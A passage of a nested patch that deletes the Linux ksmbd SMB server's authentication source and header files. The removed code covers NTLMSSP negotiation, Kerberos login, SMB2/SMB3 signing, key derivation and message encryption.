+-		cifs_arc4_setkey(ctx_arc4, sess->sess_key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-		cifs_arc4_crypt(ctx_arc4, sess->sess_key,
+-				(char *)authblob + sess_key_off, sess_key_len);
+-		kfree_sensitive(ctx_arc4);
+-	}
+-
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_decode_ntlmssp_neg_blob() - helper function to construct
+- * negotiate blob
+- * @negblob: negotiate blob source pointer
+- * @rsp:     response header pointer to be updated
+- * @sess:    session of connection
+- *
+- */
+-int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
+-				  int blob_len, struct ksmbd_conn *conn)
+-{
+-	if (blob_len < sizeof(struct negotiate_message)) {
+-		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
+-			    blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(negblob->Signature, "NTLMSSP", 8)) {
+-		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
+-			    negblob->Signature);
+-		return -EINVAL;
+-	}
+-
+-	conn->ntlmssp.client_flags = le32_to_cpu(negblob->NegotiateFlags);
+-	return 0;
+-}
+-
+-/**
+- * ksmbd_build_ntlmssp_challenge_blob() - helper function to construct
+- * challenge blob
+- * @chgblob: challenge blob source pointer to initialize
+- * @rsp:     response header pointer to be updated
+- * @sess:    session of connection
+- *
+- */
+-unsigned int
+-ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
+-				   struct ksmbd_conn *conn)
+-{
+-	struct target_info *tinfo;
+-	wchar_t *name;
+-	__u8 *target_name;
+-	unsigned int flags, blob_off, blob_len, type, target_info_len = 0;
+-	int len, uni_len, conv_len;
+-	int cflags = conn->ntlmssp.client_flags;
+-
+-	memcpy(chgblob->Signature, NTLMSSP_SIGNATURE, 8);
+-	chgblob->MessageType = NtLmChallenge;
+-
+-	flags = NTLMSSP_NEGOTIATE_UNICODE |
+-		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_SERVER |
+-		NTLMSSP_NEGOTIATE_TARGET_INFO;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_SIGN) {
+-		flags |= NTLMSSP_NEGOTIATE_SIGN;
+-		flags |= cflags & (NTLMSSP_NEGOTIATE_128 |
+-				   NTLMSSP_NEGOTIATE_56);
+-	}
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_SEAL && smb3_encryption_negotiated(conn))
+-		flags |= NTLMSSP_NEGOTIATE_SEAL;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_ALWAYS_SIGN)
+-		flags |= NTLMSSP_NEGOTIATE_ALWAYS_SIGN;
+-
+-	if (cflags & NTLMSSP_REQUEST_TARGET)
+-		flags |= NTLMSSP_REQUEST_TARGET;
+-
+-	if (conn->use_spnego &&
+-	    (cflags & NTLMSSP_NEGOTIATE_EXTENDED_SEC))
+-		flags |= NTLMSSP_NEGOTIATE_EXTENDED_SEC;
+-
+-	if (cflags & NTLMSSP_NEGOTIATE_KEY_XCH)
+-		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
+-
+-	chgblob->NegotiateFlags = cpu_to_le32(flags);
+-	len = strlen(ksmbd_netbios_name());
+-	name = kmalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!name)
+-		return -ENOMEM;
+-
+-	conv_len = smb_strtoUTF16((__le16 *)name, ksmbd_netbios_name(), len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		kfree(name);
+-		return -EINVAL;
+-	}
+-
+-	uni_len = UNICODE_LEN(conv_len);
+-
+-	blob_off = sizeof(struct challenge_message);
+-	blob_len = blob_off + uni_len;
+-
+-	chgblob->TargetName.Length = cpu_to_le16(uni_len);
+-	chgblob->TargetName.MaximumLength = cpu_to_le16(uni_len);
+-	chgblob->TargetName.BufferOffset = cpu_to_le32(blob_off);
+-
+-	/* Initialize random conn challenge */
+-	get_random_bytes(conn->ntlmssp.cryptkey, sizeof(__u64));
+-	memcpy(chgblob->Challenge, conn->ntlmssp.cryptkey,
+-	       CIFS_CRYPTO_KEY_SIZE);
+-
+-	/* Add Target Information to security buffer */
+-	chgblob->TargetInfoArray.BufferOffset = cpu_to_le32(blob_len);
+-
+-	target_name = (__u8 *)chgblob + blob_off;
+-	memcpy(target_name, name, uni_len);
+-	tinfo = (struct target_info *)(target_name + uni_len);
+-
+-	chgblob->TargetInfoArray.Length = 0;
+-	/* Add target info list for NetBIOS/DNS settings */
+-	for (type = NTLMSSP_AV_NB_COMPUTER_NAME;
+-	     type <= NTLMSSP_AV_DNS_DOMAIN_NAME; type++) {
+-		tinfo->Type = cpu_to_le16(type);
+-		tinfo->Length = cpu_to_le16(uni_len);
+-		memcpy(tinfo->Content, name, uni_len);
+-		tinfo = (struct target_info *)((char *)tinfo + 4 + uni_len);
+-		target_info_len += 4 + uni_len;
+-	}
+-
+-	/* Add terminator subblock */
+-	tinfo->Type = 0;
+-	tinfo->Length = 0;
+-	target_info_len += 4;
+-
+-	chgblob->TargetInfoArray.Length = cpu_to_le16(target_info_len);
+-	chgblob->TargetInfoArray.MaximumLength = cpu_to_le16(target_info_len);
+-	blob_len += target_info_len;
+-	kfree(name);
+-	ksmbd_debug(AUTH, "NTLMSSP SecurityBufferLength %d\n", blob_len);
+-	return blob_len;
+-}
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len, char *out_blob, int *out_len)
+-{
+-	struct ksmbd_spnego_authen_response *resp;
+-	struct ksmbd_user *user = NULL;
+-	int retval;
+-
+-	resp = ksmbd_ipc_spnego_authen_request(in_blob, in_len);
+-	if (!resp) {
+-		ksmbd_debug(AUTH, "SPNEGO_AUTHEN_REQUEST failure\n");
+-		return -EINVAL;
+-	}
+-
+-	if (!(resp->login_response.status & KSMBD_USER_FLAG_OK)) {
+-		ksmbd_debug(AUTH, "krb5 authentication failure\n");
+-		retval = -EPERM;
+-		goto out;
+-	}
+-
+-	if (*out_len <= resp->spnego_blob_len) {
+-		ksmbd_debug(AUTH, "buf len %d, but blob len %d\n",
+-			    *out_len, resp->spnego_blob_len);
+-		retval = -EINVAL;
+-		goto out;
+-	}
+-
+-	if (resp->session_key_len > sizeof(sess->sess_key)) {
+-		ksmbd_debug(AUTH, "session key is too long\n");
+-		retval = -EINVAL;
+-		goto out;
+-	}
+-
+-	user = ksmbd_alloc_user(&resp->login_response);
+-	if (!user) {
+-		ksmbd_debug(AUTH, "login failure\n");
+-		retval = -ENOMEM;
+-		goto out;
+-	}
+-	sess->user = user;
+-
+-	memcpy(sess->sess_key, resp->payload, resp->session_key_len);
+-	memcpy(out_blob, resp->payload + resp->session_key_len,
+-	       resp->spnego_blob_len);
+-	*out_len = resp->spnego_blob_len;
+-	retval = 0;
+-out:
+-	kvfree(resp);
+-	return retval;
+-}
+-#else
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len, char *out_blob, int *out_len)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif
+-
+-/**
+- * ksmbd_sign_smb2_pdu() - function to generate packet signing
+- * @conn:	connection
+- * @key:	signing key
+- * @iov:        buffer iov array
+- * @n_vec:	number of iovecs
+- * @sig:	signature value generated for client request packet
+- *
+- */
+-int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc, i;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacsha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
+-				 key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc)
+-		goto out;
+-
+-	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
+-		goto out;
+-	}
+-
+-	for (i = 0; i < n_vec; i++) {
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-					 iov[i].iov_base,
+-					 iov[i].iov_len);
+-		if (rc) {
+-			ksmbd_debug(AUTH, "hmacsha256 update error %d\n", rc);
+-			goto out;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), sig);
+-	if (rc)
+-		ksmbd_debug(AUTH, "hmacsha256 generation error %d\n", rc);
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_sign_smb3_pdu() - function to generate packet signing
+- * @conn:	connection
+- * @key:	signing key
+- * @iov:        buffer iov array
+- * @n_vec:	number of iovecs
+- * @sig:	signature value generated for client request packet
+- *
+- */
+-int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc, i;
+-
+-	ctx = ksmbd_crypto_ctx_find_cmacaes();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc cmac\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_CMACAES_TFM(ctx),
+-				 key,
+-				 SMB2_CMACAES_SIZE);
+-	if (rc)
+-		goto out;
+-
+-	rc = crypto_shash_init(CRYPTO_CMACAES(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "cmaces init error %d\n", rc);
+-		goto out;
+-	}
+-
+-	for (i = 0; i < n_vec; i++) {
+-		rc = crypto_shash_update(CRYPTO_CMACAES(ctx),
+-					 iov[i].iov_base,
+-					 iov[i].iov_len);
+-		if (rc) {
+-			ksmbd_debug(AUTH, "cmaces update error %d\n", rc);
+-			goto out;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_CMACAES(ctx), sig);
+-	if (rc)
+-		ksmbd_debug(AUTH, "cmaces generation error %d\n", rc);
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-struct derivation {
+-	struct kvec label;
+-	struct kvec context;
+-	bool binding;
+-};
+-
+-static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			struct kvec label, struct kvec context, __u8 *key,
+-			unsigned int key_size)
+-{
+-	unsigned char zero = 0x0;
+-	__u8 i[4] = {0, 0, 0, 1};
+-	__u8 L128[4] = {0, 0, 0, 128};
+-	__u8 L256[4] = {0, 0, 1, 0};
+-	int rc;
+-	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
+-	unsigned char *hashptr = prfhash;
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
+-	memset(key, 0x0, key_size);
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacsha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
+-				 sess->sess_key,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc)
+-		goto smb3signkey_ret;
+-
+-	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), i, 4);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-				 label.iov_base,
+-				 label.iov_len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with label\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), &zero, 1);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with zero\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
+-				 context.iov_base,
+-				 context.iov_len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with context\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
+-	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
+-	else
+-		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with L\n");
+-		goto smb3signkey_ret;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), hashptr);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n",
+-			    rc);
+-		goto smb3signkey_ret;
+-	}
+-
+-	memcpy(key, hashptr, key_size);
+-
+-smb3signkey_ret:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int generate_smb3signingkey(struct ksmbd_session *sess,
+-				   struct ksmbd_conn *conn,
+-				   const struct derivation *signing)
+-{
+-	int rc;
+-	struct channel *chann;
+-	char *key;
+-
+-	chann = lookup_chann_list(sess, conn);
+-	if (!chann)
+-		return 0;
+-
+-	if (conn->dialect >= SMB30_PROT_ID && signing->binding)
+-		key = chann->smb3signingkey;
+-	else
+-		key = sess->smb3signingkey;
+-
+-	rc = generate_key(conn, sess, signing->label, signing->context, key,
+-			  SMB3_SIGN_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	if (!(conn->dialect >= SMB30_PROT_ID && signing->binding))
+-		memcpy(chann->smb3signingkey, key, SMB3_SIGN_KEY_SIZE);
+-
+-	ksmbd_debug(AUTH, "dumping generated AES signing keys\n");
+-	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
+-	ksmbd_debug(AUTH, "Session Key   %*ph\n",
+-		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
+-	ksmbd_debug(AUTH, "Signing Key   %*ph\n",
+-		    SMB3_SIGN_KEY_SIZE, key);
+-	return 0;
+-}
+-
+-int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
+-			       struct ksmbd_conn *conn)
+-{
+-	struct derivation d;
+-
+-	d.label.iov_base = "SMB2AESCMAC";
+-	d.label.iov_len = 12;
+-	d.context.iov_base = "SmbSign";
+-	d.context.iov_len = 8;
+-	d.binding = conn->binding;
+-
+-	return generate_smb3signingkey(sess, conn, &d);
+-}
+-
+-int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
+-				struct ksmbd_conn *conn)
+-{
+-	struct derivation d;
+-
+-	d.label.iov_base = "SMBSigningKey";
+-	d.label.iov_len = 14;
+-	if (conn->binding) {
+-		struct preauth_session *preauth_sess;
+-
+-		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
+-		if (!preauth_sess)
+-			return -ENOENT;
+-		d.context.iov_base = preauth_sess->Preauth_HashValue;
+-	} else {
+-		d.context.iov_base = sess->Preauth_HashValue;
+-	}
+-	d.context.iov_len = 64;
+-	d.binding = conn->binding;
+-
+-	return generate_smb3signingkey(sess, conn, &d);
+-}
+-
+-struct derivation_twin {
+-	struct derivation encryption;
+-	struct derivation decryption;
+-};
+-
+-static int generate_smb3encryptionkey(struct ksmbd_conn *conn,
+-				      struct ksmbd_session *sess,
+-				      const struct derivation_twin *ptwin)
+-{
+-	int rc;
+-
+-	rc = generate_key(conn, sess, ptwin->encryption.label,
+-			  ptwin->encryption.context, sess->smb3encryptionkey,
+-			  SMB3_ENC_DEC_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	rc = generate_key(conn, sess, ptwin->decryption.label,
+-			  ptwin->decryption.context,
+-			  sess->smb3decryptionkey, SMB3_ENC_DEC_KEY_SIZE);
+-	if (rc)
+-		return rc;
+-
+-	ksmbd_debug(AUTH, "dumping generated AES encryption keys\n");
+-	ksmbd_debug(AUTH, "Cipher type   %d\n", conn->cipher_type);
+-	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
+-	ksmbd_debug(AUTH, "Session Key   %*ph\n",
+-		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
+-		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
+-			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3encryptionkey);
+-		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
+-			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3decryptionkey);
+-	} else {
+-		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
+-			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3encryptionkey);
+-		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
+-			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3decryptionkey);
+-	}
+-	return 0;
+-}
+-
+-int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
+-				  struct ksmbd_session *sess)
+-{
+-	struct derivation_twin twin;
+-	struct derivation *d;
+-
+-	d = &twin.encryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerOut";
+-	d->context.iov_len = 10;
+-
+-	d = &twin.decryption;
+-	d->label.iov_base = "SMB2AESCCM";
+-	d->label.iov_len = 11;
+-	d->context.iov_base = "ServerIn ";
+-	d->context.iov_len = 10;
+-
+-	return generate_smb3encryptionkey(conn, sess, &twin);
+-}
+-
+-int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess)
+-{
+-	struct derivation_twin twin;
+-	struct derivation *d;
+-
+-	d = &twin.encryption;
+-	d->label.iov_base = "SMBS2CCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = sess->Preauth_HashValue;
+-	d->context.iov_len = 64;
+-
+-	d = &twin.decryption;
+-	d->label.iov_base = "SMBC2SCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = sess->Preauth_HashValue;
+-	d->context.iov_len = 64;
+-
+-	return generate_smb3encryptionkey(conn, sess, &twin);
+-}
+-
+-int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
+-				     __u8 *pi_hash)
+-{
+-	int rc;
+-	struct smb2_hdr *rcv_hdr = smb2_get_msg(buf);
+-	char *all_bytes_msg = (char *)&rcv_hdr->ProtocolId;
+-	int msg_size = get_rfc1002_len(buf);
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-
+-	if (conn->preauth_info->Preauth_HashId !=
+-	    SMB2_PREAUTH_INTEGRITY_SHA512)
+-		return -EINVAL;
+-
+-	ctx = ksmbd_crypto_ctx_find_sha512();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not alloc sha512\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_SHA512(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init shashn");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA512(ctx), pi_hash, 64);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA512(ctx), all_bytes_msg, msg_size);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_SHA512(ctx), pi_hash);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
+-		goto out;
+-	}
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
+-		      __u8 *pi_hash)
+-{
+-	int rc;
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-
+-	ctx = ksmbd_crypto_ctx_find_sha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not alloc sha256\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_SHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init shashn");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA256(ctx), sd_buf, len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_SHA256(ctx), pi_hash);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
+-		goto out;
+-	}
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int ksmbd_get_encryption_key(struct ksmbd_work *work, __u64 ses_id,
+-				    int enc, u8 *key)
+-{
+-	struct ksmbd_session *sess;
+-	u8 *ses_enc_key;
+-
+-	if (enc)
+-		sess = work->sess;
+-	else
+-		sess = ksmbd_session_lookup_all(work->conn, ses_id);
+-	if (!sess)
+-		return -EINVAL;
+-
+-	ses_enc_key = enc ? sess->smb3encryptionkey :
+-		sess->smb3decryptionkey;
+-	memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
+-
+-	return 0;
+-}
+-
+-static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
+-				   unsigned int buflen)
+-{
+-	void *addr;
+-
+-	if (is_vmalloc_addr(buf))
+-		addr = vmalloc_to_page(buf);
+-	else
+-		addr = virt_to_page(buf);
+-	sg_set_page(sg, addr, buflen, offset_in_page(buf));
+-}
+-
+-static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+-					 u8 *sign)
+-{
+-	struct scatterlist *sg;
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
+-
+-	if (!nvec)
+-		return NULL;
+-
+-	for (i = 0; i < nvec - 1; i++) {
+-		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
+-
+-		if (is_vmalloc_addr(iov[i + 1].iov_base)) {
+-			nr_entries[i] = ((kaddr + iov[i + 1].iov_len +
+-					PAGE_SIZE - 1) >> PAGE_SHIFT) -
+-				(kaddr >> PAGE_SHIFT);
+-		} else {
+-			nr_entries[i]++;
+-		}
+-		total_entries += nr_entries[i];
+-	}
+-
+-	/* Add two entries for transform header and signature */
+-	total_entries += 2;
+-
+-	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
+-		return NULL;
+-
+-	sg_init_table(sg, total_entries);
+-	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
+-	for (i = 0; i < nvec - 1; i++) {
+-		void *data = iov[i + 1].iov_base;
+-		int len = iov[i + 1].iov_len;
+-
+-		if (is_vmalloc_addr(data)) {
+-			int j, offset = offset_in_page(data);
+-
+-			for (j = 0; j < nr_entries[i]; j++) {
+-				unsigned int bytes = PAGE_SIZE - offset;
+-
+-				if (!len)
+-					break;
+-
+-				if (bytes > len)
+-					bytes = len;
+-
+-				sg_set_page(&sg[sg_idx++],
+-					    vmalloc_to_page(data), bytes,
+-					    offset_in_page(data));
+-
+-				data += bytes;
+-				len -= bytes;
+-				offset = 0;
+-			}
+-		} else {
+-			sg_set_page(&sg[sg_idx++], virt_to_page(data), len,
+-				    offset_in_page(data));
+-		}
+-	}
+-	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
+-	return sg;
+-}
+-
+-int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
+-			unsigned int nvec, int enc)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(iov[0].iov_base);
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int rc;
+-	struct scatterlist *sg;
+-	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+-	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+-	struct aead_request *req;
+-	char *iv;
+-	unsigned int iv_len;
+-	struct crypto_aead *tfm;
+-	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	rc = ksmbd_get_encryption_key(work,
+-				      le64_to_cpu(tr_hdr->SessionId),
+-				      enc,
+-				      key);
+-	if (rc) {
+-		pr_err("Could not get %scryption key\n", enc ? "en" : "de");
+-		return rc;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		ctx = ksmbd_crypto_ctx_find_gcm();
+-	else
+-		ctx = ksmbd_crypto_ctx_find_ccm();
+-	if (!ctx) {
+-		pr_err("crypto alloc failed\n");
+-		return -ENOMEM;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		tfm = CRYPTO_GCM(ctx);
+-	else
+-		tfm = CRYPTO_CCM(ctx);
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
+-	else
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
+-	if (rc) {
+-		pr_err("Failed to set aead key %d\n", rc);
+-		goto free_ctx;
+-	}
+-
+-	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
+-	if (rc) {
+-		pr_err("Failed to set authsize %d\n", rc);
+-		goto free_ctx;
+-	}
+-
+-	req = aead_request_alloc(tfm, GFP_KERNEL);
+-	if (!req) {
+-		rc = -ENOMEM;
+-		goto free_ctx;
+-	}
+-
+-	if (!enc) {
+-		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+-		crypt_len += SMB2_SIGNATURE_SIZE;
+-	}
+-
+-	sg = ksmbd_init_sg(iov, nvec, sign);
+-	if (!sg) {
+-		pr_err("Failed to init sg\n");
+-		rc = -ENOMEM;
+-		goto free_req;
+-	}
+-
+-	iv_len = crypto_aead_ivsize(tfm);
+-	iv = kzalloc(iv_len, GFP_KERNEL);
+-	if (!iv) {
+-		rc = -ENOMEM;
+-		goto free_sg;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
+-		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	} else {
+-		iv[0] = 3;
+-		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	}
+-
+-	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+-	aead_request_set_ad(req, assoc_data_len);
+-	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP, NULL, NULL);
+-
+-	if (enc)
+-		rc = crypto_aead_encrypt(req);
+-	else
+-		rc = crypto_aead_decrypt(req);
+-	if (rc)
+-		goto free_iv;
+-
+-	if (enc)
+-		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+-
+-free_iv:
+-	kfree(iv);
+-free_sg:
+-	kfree(sg);
+-free_req:
+-	kfree(req);
+-free_ctx:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+diff --git a/fs/ksmbd/auth.h b/fs/ksmbd/auth.h
+deleted file mode 100644
+index 362b6159a6cff..0000000000000
+--- a/fs/ksmbd/auth.h
++++ /dev/null
+@@ -1,71 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __AUTH_H__
+-#define __AUTH_H__
+-
+-#include "ntlmssp.h"
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-#define AUTH_GSS_LENGTH		96
+-#define AUTH_GSS_PADDING	0
+-#else
+-#define AUTH_GSS_LENGTH		74
+-#define AUTH_GSS_PADDING	6
+-#endif
+-
+-#define CIFS_HMAC_MD5_HASH_SIZE	(16)
+-#define CIFS_NTHASH_SIZE	(16)
+-
+-/*
+- * Size of the ntlm client response
+- */
+-#define CIFS_AUTH_RESP_SIZE		24
+-#define CIFS_SMB1_SIGNATURE_SIZE	8
+-#define CIFS_SMB1_SESSKEY_SIZE		16
+-
+-#define KSMBD_AUTH_NTLMSSP	0x0001
+-#define KSMBD_AUTH_KRB5		0x0002
+-#define KSMBD_AUTH_MSKRB5	0x0004
+-#define KSMBD_AUTH_KRB5U2U	0x0008
+-
+-struct ksmbd_session;
+-struct ksmbd_conn;
+-struct ksmbd_work;
+-struct kvec;
+-
+-int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
+-			unsigned int nvec, int enc);
+-void ksmbd_copy_gss_neg_header(void *buf);
+-int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
